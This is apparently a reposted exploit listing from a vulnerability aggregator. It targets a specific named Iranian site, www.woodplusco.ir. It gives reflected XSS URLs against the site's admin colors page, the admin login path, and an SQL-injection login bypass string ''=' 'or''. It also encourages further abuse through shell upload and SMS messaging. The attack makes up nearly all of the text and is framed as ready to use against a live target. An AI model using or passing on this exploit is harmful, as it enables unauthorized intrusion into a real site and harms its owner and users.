woodplusco ir SQL Injection & XSS vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1841736 漏洞类型
发布时间 2019-11-30 更新时间 2019-11-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110180
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: www.woodplusco.ir bypass admin login page & XSS vulnerability

# Date:30/11/2019

# Exploit Author: nightr4id
# Tested on:Windows

# Xss Demo
https://www.woodplusco.ir/admin/colors.php?msg=<script>alert(XSS)</alert>
https://www.woodplusco.ir/admin/colors.php?msg=<script>alert(123)</script>

# Admin control panel path

https://www.woodplusco.ir/admin/login.php    

# user & pass: '=' 'or'
 
# Note: You can use other facilities such as Shell Upload and SMS messaging.

enjoy :)